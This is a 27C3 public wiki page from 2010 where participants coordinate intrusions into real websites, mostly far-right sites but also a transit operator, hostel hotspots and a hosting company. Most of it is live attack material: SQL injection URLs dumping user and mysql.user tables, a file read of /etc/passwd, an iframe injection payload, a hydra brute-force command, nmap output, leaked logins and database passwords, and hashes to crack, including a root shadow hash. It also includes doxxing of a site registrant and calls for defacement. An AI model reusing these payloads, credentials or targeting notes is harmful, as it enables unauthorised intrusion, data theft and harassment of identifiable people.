From 27C3 public wiki



Login for this page as:

  • Username: hacked Password: dekcah


NSA eZine - BEHIND ENEMY LINES Vol1. PRV09 Analyses

This information all provided 4 fr33, please send it to your friends and enjoy the audits. Download Package:
3. *In Progress
4. *In Progress

H(a/e)ckler & Koch USA - we are glad that they joined in. Greetz kabelbrand. Also: - these people are so generous... Screenshots of the subpages: firearms11419 ftp stats among others: QXxSpm3Vcc HK Custsvc heckler have fun


Also take a look at this site: <- Top Target! --> Icecast: If that isn't pure provocation and a challenge.

Same here: |<- is the same server ...afaik there are 4 or 5 domains pointing to the server some docs on the registrant: Use whois for personal data. facebook: home address maybe not current anymore, try calling him and ask nazi pack friends call themselves weisse woelfe On another one, however, there is:

  • 1. Account on the server:
    • wa6136:lena2003
      • doesn't work
    • privilege escalation possible?

Reply from the hoster

1st reply 2nd reply


Long search & win! <3 I got one. (;

By: bursali
First, go to the shop & put something to the basket.
Then, change the link to:
Start e.g. "HackBar", activate the "Enable Post data"-Feature and c&p this to the "Post Data" field:
"in_form=1&vorname=&nachname=&strasse=&ort=&epost="><IFRAME style="position:fixed;top:0;left:0;z-index:9999999;" SRC="" width="100%" height="1250"></IFRAME>&anmerkungen=&land=tr&agb=1"


By: bursali

Junge Nationalfaschisten[SQL?] ( Something should be possible there....

official organizers of the largest Nazi march in Saxony on 13-14 February in Dresden

-->joomla cms... --> but a very old version; does anyone know good exploits for it?


strange: sql error before the cookie is set. take a look.[q]=%27+OR+1+%3D+2&id=129 Can somebody analyse this? Seems like a working SQL-Injection. ->damn old cms

-> Have fun with database data =) ($typo3_db etc.) -> (PW is joh316) (You can create admin user at point2 "Database Analyzer")

FPÖ Site:,2,3,4,5,0x2f6574632f706173737764,7,8,9--

Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny6 with Suhosin-Patch mod_python/3.3.1 Python/2.5.2 mod_ssl/2.2.9 OpenSSL/0.9.8g mod_apreq2-2005123
  • Main website running NPD CMS (anybody got the sourcecode of that CMS?)
  • RPC on Port 111
  • mySQL 5.0.51a-24+lenny3 on Port 3306
  • Some strange HTTP server on port 53729
  • Nmap output:
Starting Nmap 5.21 ( ) at 2010-12-30 13:34 CET
NSE: Loaded 36 scripts for scanning.
Initiating Ping Scan at 13:34
Scanning ( [2 ports]
Completed Ping Scan at 13:34, 1.20s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 13:34
Completed Parallel DNS resolution of 1 host. at 13:34, 0.01s elapsed
Initiating Connect Scan at 13:34
Scanning ( [1000 ports]
Discovered open port 25/tcp on
Discovered open port 22/tcp on
Discovered open port 443/tcp on
Discovered open port 80/tcp on
Discovered open port 993/tcp on
Discovered open port 111/tcp on
Discovered open port 110/tcp on
Discovered open port 3306/tcp on
Discovered open port 995/tcp on
Discovered open port 143/tcp on
Discovered open port 21/tcp on
Increasing send delay for from 0 to 5 due to max_successful_tryno increase to 4
Increasing send delay for from 5 to 10 due to max_successful_tryno increase to 5
Discovered open port 873/tcp on
Completed Connect Scan at 13:34, 14.39s elapsed (1000 total ports)
Initiating Service scan at 13:34
Scanning 12 services on (
Completed Service scan at 13:35, 24.47s elapsed (12 services on 1 host)
Initiating RPCGrind Scan against (94.1 at 13:35
Completed RPCGrind Scan against (94.1 at 13:35, 0.06s elapsed (1 port)
NSE: Script scanning
NSE: Starting runlevel 1 (of 1) scan.
Initiating NSE at 13:35
Completed NSE at 13:35, 5.29s elapsed
NSE: Script Scanning completed.
Nmap scan report for (
Host is up (0.056s latency).
rDNS record for
Not shown: 988 closed ports
21/tcp   open  ftp      vsftpd 2.0.7
22/tcp   open  ssh      OpenSSH 5.1p1 Debian 5 (protocol 2.0)
| ssh-hostkey: 1024 8d:ba:19:c4:29:f5:37:78:60:19:dc:b7:74:9e:60:19 (DSA)
|_2048 57:7f:31:04:35:df:77:a8:8c:4e:c9:43:1d:fb:17:ea (RSA)
25/tcp   open  smtp     Postfix smtpd
80/tcp   open  http     Apache httpd 2.2.9 ((Debian) PHP/5.2.6-1+lenny6 with Suhosin-Patch mod_python/3.3.1 Python/2.5.2 mod_ssl/2.2.9 OpenSSL/0.9.8g mod_apreq2-20051231/2.6.0 mod...)
|_html-title: Neies - Hemecht an Natur Luxembourg
|_http-favicon: Unknown favicon MD5: A11C30EB6DAE1BB3D2E52D4B9F203A54
110/tcp  open  pop3     Dovecot pop3d
111/tcp  open  rpcbind  2 (rpc #100000)
| rpcinfo:  
| 100000  2    111/udp  rpcbind  
| 100024  1  54036/udp  status   
| 100000  2    111/tcp  rpcbind  
|_100024  1  53729/tcp  status   
143/tcp  open  imap     Dovecot imapd
443/tcp  open  ssl/http Apache httpd 2.2.9 ((Debian) PHP/5.2.6-1+lenny6 with Suhosin-Patch mod_python/3.3.1 Python/2.5.2 mod_ssl/2.2.9 OpenSSL/0.9.8g mod_apreq2-20051231/2.6.0 mod...)
|_html-title: Parallels Confixx
873/tcp  open  rsync    (protocol version 30)
993/tcp  open  ssl/imap Dovecot imapd
|_sslv2: server still supports SSLv2
995/tcp  open  ssl/pop3 Dovecot pop3d
|_sslv2: server still supports SSLv2
3306/tcp open  mysql    MySQL 5.0.51a-24+lenny3
| mysql-info: Protocol: 10
| Version: 5.0.51a-24+lenny3
| Thread ID: 835603
| Some Capabilities: Connect with DB, Compress, Transactions, Secure Connection
| Status: Autocommit
|_Salt: y2+~]65GC]*VRz/v,pts
Service Info: Host:; OSs: Unix, Linux

Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 45.86 seconds


Table dump:

Password/Username cleartext dump:','a')=0)+union+all+select+id_user,user_name,user_fullname,user_pwd,5,6+from+dbo.GKPUser+--

Nice many "password", clear passwords or "*" as login for "Admin"... These usernames also work for :) (not Admin)

recursive wget-dump of


Archived duty rosters and all sorts of things from Kölner Verkehrs-Betriebe:

I think the Mofi generator is also used directly for the stops. So get going ;-) Here is a text template: +++ Unbelievable: You really believe that the times shown on these info boards are correct? Hahahaha, you are naive. Your KVB... We Come in Peace +++

Dumped files (wget -m): magnet:?xt=urn:btih:f3d889b8d76929296fa596e3553602447fbb018b& or


I reworked a mini server of mine (lighttpd 1.4.28, mysql 5.1, php 5.3.4) and put a Piwik installation on it: User: ccc Pass: ccc123

Anyone who feels like helping to find out whether/how it can be defaced (with or without login) is very welcome. The Piwik source can be found at - the current trunk (i.e. 1.1b4) is installed.

> PwnD!

MATCHED by: Rem0ve
Comment: Gr33tz 2 x4


exploit in demos

Multiple vulns in multiple demos versions from here:, used for some kind of regional democracy improvement. "Vendor" is informed ...


210/1027 hashes cracked with usernames and emails PMs as html,33775890/index.html/ PMs as TXT: Please read: stupid! :D Funny PM from the Naziboard:


-- Dunkin Dos -- Epic Fail ! Slogan collection for a more cost effective Dos:

  • "Is this the employment office?"
  • "Oh, I forgot my money..."
  • "Is the icing glucose-free?"
  • "Do you also have Berliner?"
  • "Do you have that with beef too?"
  • "Is the donut really dead?"
  • "Was the donut produced sustainably?"
  • "Does the donut contain traces of poultry or nuts?"
  • "One with hot sauce, no onions or peppers please!"
  • "Fries red/white please!"
  • "Do speak English? My English ill, so you speak slow, please. I want a... how do you call those thingies over there?"
  • "I want my money back! There is something missing, in the middle!"
  • "I have some keys... Can I sell my keys here? If you want keys, i got some keys for Tempelhof and I can sell you some keys ... " (lightning talks day 2: last speaker)

--Burger King --

-- Operation Payback --

  • Hi, I have a technical complaint about this burger, it's gone, like if somebody ate it. May I have my money back?

spread the word

  • DaPhix Prepay-Internet-Hotspot @ -> last years instructions don't work anymore. Ey, they improve! BUT: the SOAP service to create a new account can still be used. You can reach it directly from their free WLAN. :) Here is some ruby code to generate an account for free internet access: (shorter PHP code is available at ). Other more or less interesting services can be found at Perhaps you want to get a full list of possible passwords using PropertyService:getProperty('password')? Feel free to play ;-)

Update: Meininger City Hostels (Hauptbahnhof): Last years hack was fixed, but the Soaphack above still works. Also, username "1" and password "berlin" gets you free internet -- without having to deal with Ruby!

  • ruby noobs should try complete path to savon.rb if it is not starting
require 'rubygems'
#require 'Savon'
require '/var/lib/gems/1.8/gems/savon-0.8.1/lib/savon.rb'

Note: This hack is for debian only, which neuters rubygems.

  • require 'savon' with a small s works well on ruby 1.9.2

DaPhix hotspots are used by many Hostels, including Generator, Meininger and Baxpax. In case the SOAP trick shouldn't work anymore, you can always use a DNS tunnel, for example iodine.

Some hostels got a fix during night of day 1 to day 2. Seems that they learned to not expose SOAP sell webservices via the hotspot.

Anyone got a working solution for the DaPhix Hotspot at Meininger Hostel Prenzlauer Berg?


Please, make this section clean and nice, no lame XSS on random sites. XSS can be cool if it's stored XSS, allows you to write a webworm (SAMY! COME BACK!) or such. Thanks!



because they ***** are still in heaven. /hate



 * it-expert. not.
 * ( naziscum ... )
 * > part 2 :D
 * just something to read <- local net-shop based in mecklenburg
 * - user: greg pass: no1hacker  
 * nmap
 * <-- shared wordpress hosting for nazis nmap
 * (wordpress 3.0.2,
 * (Joomla, protected by [CT Security System|]
 * the NPD CMS, used on,,, and many more
 * (vBulletin 3.8.4)
 * [1]
 * ;)
 * (botched wordpress)
 * Complete nmap scan with a whole bunch of open ports  (Incl. cpanel)
 * /|\ Why THIS page? The server is open like a barn. And of course because we can.
 * <-- use npd cms
 * <- need a Java script expert on this, its asking for defacing...
 * nmap
 * <- TOP Target ! ;)
 * <- TOP Target ! ;)
 * - (ip has changed) freebsd box which i set for fun, try hacking it.
 * or .com
 * (typo3 and runs old vsFTPd 2.0.7)
 * (yes, there are also Nazi fucktards in .LU -_-) <-- use npd cms
 * QM is the who?
 ** Could you create a "manual" feed for the folder of documents? :-)
 * a list of nazisites
* or/and (or any other Deutsche Bahn-Site)
*  <--- Nazi-shemale
* <---Bertelsmann education submarine
* <--- Catholicists. Fascist, homophobic, antisemitic, Holocaust deniers etc.
** "How does someone become homosexual? (..) A person becomes homosexual during puberty when he is seduced or sexually abused by older homosexuals." from 
** "Atheism is another word for sex addiction and hatred"
** See also: " by contrast holds the long-outdated thesis that gays and lesbians can be "cured": The "theory" that homosexuality cannot simply be changed by praying is "repeatedly refuted in practice by numerous conversions."
 *it's typo 3, database is set up, if u are a typo3 guy, u can deface it, go for it, i have never worked with typo3
 *mysql user: b2dent334
 *mysql pass: wecomeinpeace
 *mysql host:
 *mysql port: 3306

would be nice if some "expert" take a look at this weak pages, thanks!

   * (editorial access) 
   * (old website)
       * bruteforce usernames (wordlist) on 9live-server: hydra -l home -p words http-post-form "/portal/gs/feed.jsp:login&stationname=../../../../../../home/^USER^/../../../../../../../../../usr/share/tomcat5/webapps/portal/gs/9live&type=RLA:gs_sender.css" 
   * username to mail
   * full path disclosure (/export/www/CONTENT/9live-80/docs/php-bin/lib/Adodb/ 
   :* < h1>Connecting mysqli...< /h1>ERROR: MySQL test requires a MySQL server on localhost, userid='admin', password=, database='test'
     Can't connect to local MySQL server through socket '/var/lib/mysql/mysql.sock' (2)< h3>Tests Completed< /h3>curl

Insecure Passwords

 * (user: ' or 1=1-- ; pass=' or 1=1--)
 * see ZDF section

File Inclusions,2,3,4,5,6,7,load_file(0x2f6574632f706173737764),9,10,11,21,31,41,5,16,17,18,19,20,21,22,23,24

SQL Injections,2,3,4,5,6,7,8,9,concat(user,0xa,password,0xa,host),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26%20from%20mysql.user--&jahr=2010,2,@@datadir,4,5,6,7,8,9,10,11%20FROM%20auth_users--

Doesn't work?? create an account. Sure? regarding to,1%23,2,3,4,5,6,user,%20password,9,host,11,21,31,41,5,16,17,18,19,20,21,22,23,24%20from%20mysql.user,npa,pseudo,password,5,6,email,8,9,10,11,12,13%20from%20users,2,3,4,5,6,7,8,9,10,host,%20user,%20password,14,15,16,17,18,19%20from%20mysql.user,@@version-- (fixed),2,3,password,5,username,7,8,9,10,11,12%20from%20svp_users,pass,name,id,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+bbdw_ttb_user--&p=3&a=10&aid=92,2,column_name,4,5,6,table_name,8%20from%20information_schema.columns--,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,concat_ws%28%27;%27,ID,ADMIN,VORNAME,NAME,EMAIL,BENUTZER,PASSWORD%29,91,92,93,94,95,96%20from%20Benutzer--+&ART=1 (the MD5 hash for translates to 28252219)

Didn't work for me. But,2,3,4,5,6,7,8,9,10,11,12,13,BENUTZER,15,16,17,18,19,20,21,22,23,24,25,PASSWORD,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96%20from%20Benutzer did.

Clans should upgrade their Clansphere, like suggests ...:,2,users_nick,users_pwd,5%20from%20cs_users%20--%20#

Happy little cloud

hashes to crack

46EA83AE992E10A43DD56FF4E3C2C84918980F57 (mysql)

AAD3B435B51404EEAAD3B435B51404EE:0744366FB9B73089AE392B8937182C1D (ntlm)

$1$7IzC.lOd$GtGD1Dkp7CZzkbSOuCr1F0 (root password from /etc/shadow)

6d2bb5d42c8321be2783fa847f161831 (md5)

Plaintext: "JASh2J." HEX: 4a 41 53 68 32 4a 2e

b614cb5d3fa744fb788e285ac3de612e (md5)

c8f85603eaeefd09b5cc1d1933427a22 (md5)

61904682c0fd1cabb2b1ff42e564c500 (md5, Asgard Forum: Username:admin)

Wasn't that running vBulletin? vBulletin = md5(md5($pass).$salt)) and the table has a Salt column ;)

BC31095A7DA2A3206BDB3F1319CA5220 (Win LM)

Was this extracted OK? Can you provide the complete CAIN or pwdump/fgdump-output? The NTLM-Hash is needed to provide the exact password, LM will only yield Uppercase and strange mappings for certain special characters.

wpa-handshakes to crack

misc (Nazi-Shop) - Order something and edit the article price in the post request (

Typical Nazis...big mouth, nothing behind it :D ( for nginx 0.6.32 (from nmap) ... <0.6.38

hacked but working QR-Code for 27c3 : (can be verified with online qr decoder at

old TYPO3

  • you'll find many old cms ""typo3_src-4.1.1/typo3/sysext/" Change only the versionnumber..


  • search a Page with an existing ID (here 4)
  • open the link and copy the hash value (here: Calculated juHash, 3b85b28449)
  • rebuild the link and download the localconf.php
Oh yes , see here this provider is so stupid min 20 Websites:

Fnord-Jahresrückblick 2010

  • 9 alarm clocks placed under chairs in the audience and 1 under the speakers table. they went off at 10:20 pm.

Open to the web

Topic: customer data online ... (obviously) clueless Swiss .... redCOR AG has a lot of experience ... and yet all customer data is on the net:

->  <-

Passwords, credentials, personal messages, database dumps (for e.g. work and much more. BUT!: we come in peace -> Remember!


  • DWDL: breaking owl news: hacked: an owl and the proverbial sack of rice. We have a screenshot: